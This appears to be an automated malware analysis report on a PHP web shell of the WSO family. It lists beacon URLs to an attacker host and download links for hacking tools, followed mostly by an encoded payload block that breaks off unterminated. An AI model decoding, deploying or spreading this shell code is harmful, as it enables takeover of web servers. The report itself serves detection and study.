PHP Malware Analysis

cmd.php, wpro.txt, wso.php, wso1.php, wso1.php.PDF, wso1.php.suspected

md5: 9d98853a714da34855a92cb5ba345601

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title

URLs
  • http://byr00t.co/l (Traces)
  • http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA= (Traces)
  • http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzby5waHA= (Traces)
  • http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw (Traces)
  • http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLlBERg== (Traces)
  • http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhwLnN1c3BlY3RlZA== (Traces)
  • http://byr00t.co/txt/tools.txt (Deobfuscated, Traces)
  • http://i.hizliresim.com/z4lrbR.png (Deobfuscated, Traces)
  • http://imagizer.imageshack.us/a/img440/4273/6fix.png (Deobfuscated, Traces)
  • http://localhost/uploads/cmd.php (Traces)
  • http://localhost/uploads/wso.php (Traces)
  • http://localhost/uploads/wso1.php (Traces)
  • http://localhost/uploads/wso1.php.PDF (Traces)
  • http://localhost/uploads/wso1.php.suspected (Traces)
  • http://localhost/wso1.php.suspected (HTML)
  • http://phpshell.in/txt/lamer.txt (Deobfuscated, Traces)
  • http://phpshell.in/txt/phpinfo.txt (Deobfuscated, Traces)
  • http://phpshell.in/txt/seo.txt (Deobfuscated, Traces)
  • http://r00t.info/shell-dosyalar/logo.png (Deobfuscated, Traces)
  • http://www (Deobfuscated, Traces)
  • http://www.facebook.com/plugins/likebox.php (Deobfuscated, Traces)
  • http://www.html5rocks.com/en/tutorials/canvas/hidpi/ (HTML)
  • https://byr00t.co/vb/cgi.zip (Deobfuscated, Traces)
  • https://byr00t.co/vb/cpanel.zip (Deobfuscated, Traces)
  • https://byr00t.co/vb/sqlbuddy.zip (Deobfuscated, Traces)
  • https://crbug.com/740629 (HTML)
  • https://w3c.github.io/gamepad/#remapping (HTML)
  • https://www.facebook.com/r00t.info& (Deobfuscated, Traces)


Deobfuscated PHP code

<?php

$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA==";
$stt0 = "==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